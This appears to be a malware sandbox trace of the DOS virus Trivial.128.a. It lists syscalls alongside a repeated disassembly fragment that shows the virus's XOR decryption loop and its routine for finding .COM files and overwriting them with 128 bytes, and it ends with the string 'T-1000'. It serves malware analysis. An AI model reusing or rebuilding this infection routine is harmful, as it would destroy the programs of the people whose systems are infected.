Sample viewer

vx.netlux.org/Virus.DOS.Trivial.128.a

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:46:42.866047944Z 44 PC: 12a5e | Get time 0x12a5e: mov byte ptr [0x116], dl
0x12a62: mov si, 0x117
0x12a65: mov di, 0x18a
0x12a68: mov cx, 0x69
0x12a6b: lodsb al, byte ptr [si]
0x12a6c: xor al, byte ptr [0x116]
0x12a70: stosb byte ptr es:[di], al
0x12a71: dec cx
0x12a72: cmp cx, -1
0x12a75: jne 0x12a6b
0x12a77: pop ax
0x12a78: xor cx, cx
0x12a7a: mov dx, 0x17a
0x12a7d: int 0x21
0x12a7f: jb 0x12aa8
0x12a81: mov ax, 0x3d01
0x12a84: mov dx, 0x9e
0x12a87: int 0x21
0x12a89: mov bx, ax
0x12a8b: mov ah, 0x40
2018-12-17T22:46:42.868877446Z 78 PC: 12a7f | Find first file
2018-12-17T22:46:42.875140049Z 61 PC: 12a89 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:46:42.881499704Z 64 PC: 12a96 | Write file or device (Write 23 bytes on handle 5)
2018-12-17T22:46:42.888001844Z 64 PC: 12a9f | Write file or device (Write 105 bytes on handle 5)
2018-12-17T22:46:42.891286502Z 62 PC: 12aa3 | Close file
2018-12-17T22:46:42.905041989Z 44 PC: 12a5e | Get time 0x12a5e: mov byte ptr [0x116], dl
0x12a62: mov si, 0x117
0x12a65: mov di, 0x18a
0x12a68: mov cx, 0x69
0x12a6b: lodsb al, byte ptr [si]
0x12a6c: xor al, byte ptr [0x116]
0x12a70: stosb byte ptr es:[di], al
0x12a71: dec cx
0x12a72: cmp cx, -1
0x12a75: jne 0x12a6b
0x12a77: pop ax
0x12a78: xor cx, cx
0x12a7a: mov dx, 0x17a
0x12a7d: int 0x21
0x12a7f: jb 0x12aa8
0x12a81: mov ax, 0x3d01
0x12a84: mov dx, 0x9e
0x12a87: int 0x21
0x12a89: mov bx, ax
0x12a8b: mov ah, 0x40
2018-12-17T22:46:42.90762333Z 79 PC: 12a7f | Find next file
2018-12-17T22:46:42.911667648Z 61 PC: 12a89 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:46:42.919894178Z 64 PC: 12a96 | Write file or device (Write 23 bytes on handle 5)
2018-12-17T22:46:42.926519547Z 64 PC: 12a9f | Write file or device (Write 105 bytes on handle 5)
2018-12-17T22:46:42.929641355Z 62 PC: 12aa3 | Close file
2018-12-17T22:46:42.938561312Z 44 PC: 12a5e | Get time 0x12a5e: mov byte ptr [0x116], dl
0x12a62: mov si, 0x117
0x12a65: mov di, 0x18a
0x12a68: mov cx, 0x69
0x12a6b: lodsb al, byte ptr [si]
0x12a6c: xor al, byte ptr [0x116]
0x12a70: stosb byte ptr es:[di], al
0x12a71: dec cx
0x12a72: cmp cx, -1
0x12a75: jne 0x12a6b
0x12a77: pop ax
0x12a78: xor cx, cx
0x12a7a: mov dx, 0x17a
0x12a7d: int 0x21
0x12a7f: jb 0x12aa8
0x12a81: mov ax, 0x3d01
0x12a84: mov dx, 0x9e
0x12a87: int 0x21
0x12a89: mov bx, ax
0x12a8b: mov ah, 0x40
2018-12-17T22:46:42.941332515Z 79 PC: 12a7f | Find next file
2018-12-17T22:46:42.945138428Z 61 PC: 12a89 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:46:42.951624603Z 64 PC: 12a96 | Write file or device (Write 23 bytes on handle 5)
2018-12-17T22:46:42.958226993Z 64 PC: 12a9f | Write file or device (Write 105 bytes on handle 5)
2018-12-17T22:46:42.961573478Z 62 PC: 12aa3 | Close file
2018-12-17T22:46:42.969337206Z 44 PC: 12a5e | Get time 0x12a5e: mov byte ptr [0x116], dl
0x12a62: mov si, 0x117
0x12a65: mov di, 0x18a
0x12a68: mov cx, 0x69
0x12a6b: lodsb al, byte ptr [si]
0x12a6c: xor al, byte ptr [0x116]
0x12a70: stosb byte ptr es:[di], al
0x12a71: dec cx
0x12a72: cmp cx, -1
0x12a75: jne 0x12a6b
0x12a77: pop ax
0x12a78: xor cx, cx
0x12a7a: mov dx, 0x17a
0x12a7d: int 0x21
0x12a7f: jb 0x12aa8
0x12a81: mov ax, 0x3d01
0x12a84: mov dx, 0x9e
0x12a87: int 0x21
0x12a89: mov bx, ax
0x12a8b: mov ah, 0x40
2018-12-17T22:46:42.971795414Z 79 PC: 12a7f | Find next file
2018-12-17T22:46:42.974930379Z 61 PC: 12a89 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:46:42.981854203Z 64 PC: 12a96 | Write file or device (Write 23 bytes on handle 5)
2018-12-17T22:46:42.988539818Z 64 PC: 12a9f | Write file or device (Write 105 bytes on handle 5)
2018-12-17T22:46:42.991470341Z 62 PC: 12aa3 | Close file
2018-12-17T22:46:43.000093815Z 44 PC: 12a5e | Get time 0x12a5e: mov byte ptr [0x116], dl
0x12a62: mov si, 0x117
0x12a65: mov di, 0x18a
0x12a68: mov cx, 0x69
0x12a6b: lodsb al, byte ptr [si]
0x12a6c: xor al, byte ptr [0x116]
0x12a70: stosb byte ptr es:[di], al
0x12a71: dec cx
0x12a72: cmp cx, -1
0x12a75: jne 0x12a6b
0x12a77: pop ax
0x12a78: xor cx, cx
0x12a7a: mov dx, 0x17a
0x12a7d: int 0x21
0x12a7f: jb 0x12aa8
0x12a81: mov ax, 0x3d01
0x12a84: mov dx, 0x9e
0x12a87: int 0x21
0x12a89: mov bx, ax
0x12a8b: mov ah, 0x40
2018-12-17T22:46:43.002446653Z 79 PC: 12a7f | Find next file
2018-12-17T22:46:43.005196799Z 61 PC: 12a89 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:46:43.020743672Z 64 PC: 12a96 | Write file or device (Write 23 bytes on handle 5)
2018-12-17T22:46:43.027195207Z 64 PC: 12a9f | Write file or device (Write 105 bytes on handle 5)
2018-12-17T22:46:43.029827526Z 62 PC: 12aa3 | Close file
2018-12-17T22:46:43.037761084Z 44 PC: 12a5e | Get time 0x12a5e: mov byte ptr [0x116], dl
0x12a62: mov si, 0x117
0x12a65: mov di, 0x18a
0x12a68: mov cx, 0x69
0x12a6b: lodsb al, byte ptr [si]
0x12a6c: xor al, byte ptr [0x116]
0x12a70: stosb byte ptr es:[di], al
0x12a71: dec cx
0x12a72: cmp cx, -1
0x12a75: jne 0x12a6b
0x12a77: pop ax
0x12a78: xor cx, cx
0x12a7a: mov dx, 0x17a
0x12a7d: int 0x21
0x12a7f: jb 0x12aa8
0x12a81: mov ax, 0x3d01
0x12a84: mov dx, 0x9e
0x12a87: int 0x21
0x12a89: mov bx, ax
0x12a8b: mov ah, 0x40
2018-12-17T22:46:43.040150414Z 79 PC: 12a7f | Find next file
2018-12-17T22:46:43.042886677Z 61 PC: 12a89 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:46:43.050958679Z 64 PC: 12a96 | Write file or device (Write 23 bytes on handle 5)
2018-12-17T22:46:43.057625524Z 64 PC: 12a9f | Write file or device (Write 105 bytes on handle 5)
2018-12-17T22:46:43.06022296Z 62 PC: 12aa3 | Close file
2018-12-17T22:46:43.068582512Z 44 PC: 12a5e | Get time 0x12a5e: mov byte ptr [0x116], dl
0x12a62: mov si, 0x117
0x12a65: mov di, 0x18a
0x12a68: mov cx, 0x69
0x12a6b: lodsb al, byte ptr [si]
0x12a6c: xor al, byte ptr [0x116]
0x12a70: stosb byte ptr es:[di], al
0x12a71: dec cx
0x12a72: cmp cx, -1
0x12a75: jne 0x12a6b
0x12a77: pop ax
0x12a78: xor cx, cx
0x12a7a: mov dx, 0x17a
0x12a7d: int 0x21
0x12a7f: jb 0x12aa8
0x12a81: mov ax, 0x3d01
0x12a84: mov dx, 0x9e
0x12a87: int 0x21
0x12a89: mov bx, ax
0x12a8b: mov ah, 0x40
2018-12-17T22:46:43.070999445Z 79 PC: 12a7f | Find next file
2018-12-17T22:46:43.074467054Z 61 PC: 12a89 | Open file (Filename = 'PAH.COM')
2018-12-17T22:46:43.081818194Z 64 PC: 12a96 | Write file or device (Write 23 bytes on handle 5)
2018-12-17T22:46:43.088626478Z 64 PC: 12a9f | Write file or device (Write 105 bytes on handle 5)
2018-12-17T22:46:43.091219325Z 62 PC: 12aa3 | Close file
2018-12-17T22:46:43.099684829Z 44 PC: 12a5e | Get time 0x12a5e: mov byte ptr [0x116], dl
0x12a62: mov si, 0x117
0x12a65: mov di, 0x18a
0x12a68: mov cx, 0x69
0x12a6b: lodsb al, byte ptr [si]
0x12a6c: xor al, byte ptr [0x116]
0x12a70: stosb byte ptr es:[di], al
0x12a71: dec cx
0x12a72: cmp cx, -1
0x12a75: jne 0x12a6b
0x12a77: pop ax
0x12a78: xor cx, cx
0x12a7a: mov dx, 0x17a
0x12a7d: int 0x21
0x12a7f: jb 0x12aa8
0x12a81: mov ax, 0x3d01
0x12a84: mov dx, 0x9e
0x12a87: int 0x21
0x12a89: mov bx, ax
0x12a8b: mov ah, 0x40
2018-12-17T22:46:43.102133044Z 79 PC: 12a7f | Find next file
2018-12-17T22:46:43.109882475Z 61 PC: 12a89 | Open file (Filename = 'TEST.COM')
2018-12-17T22:46:43.117130479Z 64 PC: 12a96 | Write file or device (Write 23 bytes on handle 5)
2018-12-17T22:46:43.119950572Z 64 PC: 12a9f | Write file or device (Write 105 bytes on handle 5)
2018-12-17T22:46:43.122508159Z 62 PC: 12aa3 | Close file
2018-12-17T22:46:43.13065132Z 44 PC: 12a5e | Get time 0x12a5e: mov byte ptr [0x116], dl
0x12a62: mov si, 0x117
0x12a65: mov di, 0x18a
0x12a68: mov cx, 0x69
0x12a6b: lodsb al, byte ptr [si]
0x12a6c: xor al, byte ptr [0x116]
0x12a70: stosb byte ptr es:[di], al
0x12a71: dec cx
0x12a72: cmp cx, -1
0x12a75: jne 0x12a6b
0x12a77: pop ax
0x12a78: xor cx, cx
0x12a7a: mov dx, 0x17a
0x12a7d: int 0x21
0x12a7f: jb 0x12aa8
0x12a81: mov ax, 0x3d01
0x12a84: mov dx, 0x9e
0x12a87: int 0x21
0x12a89: mov bx, ax
0x12a8b: mov ah, 0x40
2018-12-17T22:46:43.133033974Z 79 PC: 12a7f | Find next file
2018-12-17T22:46:43.138544384Z 9 PC: 12ab1 | Display string (String= 'T-1000')